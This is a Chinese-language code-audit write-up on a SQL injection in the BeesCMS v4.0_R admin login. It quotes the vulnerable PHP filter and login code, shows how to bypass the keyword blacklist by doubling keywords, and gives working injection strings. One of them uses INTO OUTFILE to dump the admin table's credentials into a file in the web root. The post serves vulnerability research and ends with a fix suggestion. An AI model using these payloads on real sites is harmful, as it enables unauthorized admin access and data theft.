【代码审计初探】beescms v4.0_R SQL

//判断登录elseif($action=='ck_login'){        global $submit,$user,$passWord,$_sys,$code;        $submit=$_POST['submit'];        $user=fl_html(fl_value($_POST['user']));        $password=fl_html(fl_value($_POST['password']));        $code=$_POST['code'];        if(!isset($submit)){                msg('请从登陆页面进入');        }        if(empty($user)||empty($password)){                msg("密码或用户名不能为空");        }        if(!empty($_sys['safe_open'])){                foreach($_sys['safe_open'] as $k=>$v){                if($v=='3'){                        if($code!=$s_code){msg("验证码不正确！");}                }                }                }        check_login($user,$password);         }看到此处对输入的用户名和密码进行的操作：
$user=fl_html(fl_value($_POST['user']));$password=fl_html(fl_value($_POST['password']));定位到函数fl_value 和 函数 fl_html : （都位于/includes/fun.php下面）
function fl_value($str){        if(empty($str)){return;}        return PReg_replace('/select|insert | update | and | in | on | left | joins | delete |/%|/=|///*|/*|/././/|/.//| union | from | where | group | into |load_file|outfile/i','',$str);}function fl_html($str){        return htmlspecialchars($str);}可以看到fl_html函数过滤了一些可能引起XSS的字符，而 函数 fl_value则是对输入的关键字进行了过滤，可以看到，几乎常用的SQL关键字都被过滤掉了，这个时候看看preg_replace()函数中的正则表达式，经过几次尝试，得到了Bypass的方法：具体规则如下：
union => uni union onselect => selselectectoutfile => outoutfilefileinto => into……同时，登录SQL执行代码在fun.php中，如下：
function check_login($user,$password){        $rel=$GLOBALS['MySQL']->fetch_asc("select id,admin_name,admin_password,admin_purview,is_disable from ".DB_PRE."admin where admin_name='".$user."' limit 0,1");         $rel=empty($rel)?'':$rel[0];        if(empty($rel)){                msg('不存在该管理用户','login.php');        }        $password=md5($password);        if($password!=$rel['admin_password']){                msg("输入的密码不正确");        }        if($rel['is_disable']){                msg('该账号已经被锁定,无法登陆');        }                 $_session['admin']=$rel['admin_name'];        $_SESSION['admin_purview']=$rel['admin_purview'];        $_SESSION['admin_id']=$rel['id'];        $_SESSION['admin_time']=time();        $_SESSION['login_in']=1;        $_SESSION['login_time']=time();        $ip=fl_value(get_ip());        $ip=fl_html($ip);        $_SESSION['admin_ip']=$ip;        unset($rel);        header("location:admin.php");}可以知道字段数为5，下面通过构造语句：
admin' uni union on selselectect 1,2,3,4,5--%20可以看到返回了正常页面：（check_login可知SQL是先执行username查询之后再验证密码的，所以如下输入结果正常）知道了这个注入规则之后，就有各种各样的注入方法了，下面我使用了一种可以直接拿到管理员账号密码的：如：(本地环境测试的)注入如下语句：
user=admin' uni union on selselectect 1,2,3,4,5 ''  in into  outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20目的是在网站根目录下新建a.php文件，可以记录表 bees_admin里面的信息在a.php里面（由于函数hl_html的过滤导致不能直接上传 php木马）。效果图如下：此时，网站根目录下面已经产生了a.php这个文件了，如下所示：a.php里面前面的部分为bees_admin表里面的admin所对应的内容，后面的1~5则是为了补全select语法在payload里面写的内容。这样的话，就可以拿管理员登录后台了。当然，注入手法很多，知道了这个规则，各种注入就可以上场了。0x05 修复建议及总结fl_value函数的正则验证需要加强~虽然fl_value函数挡住了寻常注入语句，但是由于过滤不严导致Bypass掉全局的sql注入防护。代码审计过程中对于一些过滤函数类应该特别留意，尝试去绕过，往往会有意想不到的惊喜。